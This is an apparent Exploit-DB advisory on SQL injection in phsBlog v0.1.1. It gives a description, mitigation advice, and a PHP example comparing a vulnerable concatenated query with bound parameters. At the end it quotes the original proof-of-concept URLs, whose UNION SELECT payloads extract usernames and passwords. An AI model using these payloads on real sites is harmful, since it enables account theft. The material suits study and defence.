Vendor: phsBlog
By: cOndemned
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: phsBlog
Affected Version From: 2000.1.1
Affected Version To: 2000.1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:phsblog:phsblog:0.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phsBlog v0.1.1 Multiple Remote SQL Injection Vulnerabilities

phsBlog v0.1.1 contains multiple remote SQL injection vulnerabilities. They exist because user-supplied input is insufficiently sanitized in the 'eid' parameter of 'comments.php' and the 'urltitle' parameter of 'entries.php'. An attacker can exploit them by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable scripts. Successful exploitation can result in unauthorized access to sensitive information such as usernames and passwords. The proof of concept below also lists the 'cid' parameter of 'index.php'.

Mitigation:

Validate user-supplied input so that it is properly sanitized before it reaches a SQL query. Additionally, keep the application up to date with the latest security patches.
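The mitigation above, as an added example that is not phsBlog's own code: it shows why quote escaping alone (the effect of Magic Quotes) does not protect a numeric parameter such as 'eid', and how type validation plus bound parameters handles both 'eid' and 'urltitle'. Assumptions: the table layout and function names are hypothetical, and an in-memory SQLite database via PDO (pdo_sqlite) stands in for the blog's real database so the script runs offline.

```php
<?php
// Added example. Table layout and function names are hypothetical, not phsBlog's.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comments (eid INTEGER, author TEXT, body TEXT)');
$db->exec('CREATE TABLE entries (urltitle TEXT, title TEXT)');
$db->exec('CREATE TABLE users (username TEXT, password TEXT)');
$db->exec("INSERT INTO comments VALUES (1, 'alice', 'nice post')");
$db->exec("INSERT INTO entries VALUES ('hello-world', 'Hello world')");
$db->exec("INSERT INTO users VALUES ('admin', 'constructed-hash')");

// Weak: escape quotes (what magic_quotes_gpc did), then concatenate.
// eid sits in an unquoted numeric context, so there is nothing to escape.
function comments_concat(PDO $db, string $eid): array {
    $sql = 'SELECT author, body FROM comments WHERE eid = ' . addslashes($eid);
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: accept only a positive integer and bind it with its type.
function comments_bound(PDO $db, string $eid): array {
    $id = filter_var($eid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];
    }
    $stmt = $db->prepare('SELECT author, body FROM comments WHERE eid = ?');
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Hardened: urltitle is text, so allow-list its shape and bind it as a string.
function entry_bound(PDO $db, string $urltitle): array {
    if (!preg_match('/\A[a-z0-9-]{1,100}\z/i', $urltitle)) {
        return [];
    }
    $stmt = $db->prepare('SELECT title FROM entries WHERE urltitle = ?');
    $stmt->execute([$urltitle]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Constructed inputs: the first has the same shape as the advisory's eid request.
$probe = '-1 UNION SELECT username, password FROM users';
echo 'concat, probe:  ', json_encode(comments_concat($db, $probe)), "\n";
echo 'bound, probe:   ', json_encode(comments_bound($db, $probe)), "\n";
echo 'bound, eid=1:   ', json_encode(comments_bound($db, '1')), "\n";
echo 'entry, quoted:  ', json_encode(entry_bound($db, "hello'world")), "\n";
echo 'entry, valid:   ', json_encode(entry_bound($db, 'hello-world')), "\n";
```

The allow-list pattern for 'urltitle' is an assumption about what a slug looks like; the bound parameter is what keeps the value out of the SQL text even if the pattern is loosened.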

Exploit-DB raw data:

#####################################################################################
#
#   Name    :   phsBlog v0.1.1 Multiple Remote SQL Injection Vulnerabilities
#   Author  :   cOndemned [Dark-Coders member]
#   Greetz  :   ZaBeaTy, GregStar, str0ke, 0in, suN8Hclf, ixos, TBH, Avantura :**
#
#####################################################################################


Proof of Concept :

    Magic Quotes = On/Off 

        http://[host]/[phsBlog_path]/comments.php?eid=-1+UNION+SELECT+concat_ws(0x3a,username,password),2+FROM+phsblog_users/*

    Magic Quotes = Off

        http://[host]/[phsBlog_path]/index.php?cid='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users/*
        http://[host]/[phsBlog_path]/entries.php?urltitle='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users

# milw0rm.com [2008-08-01]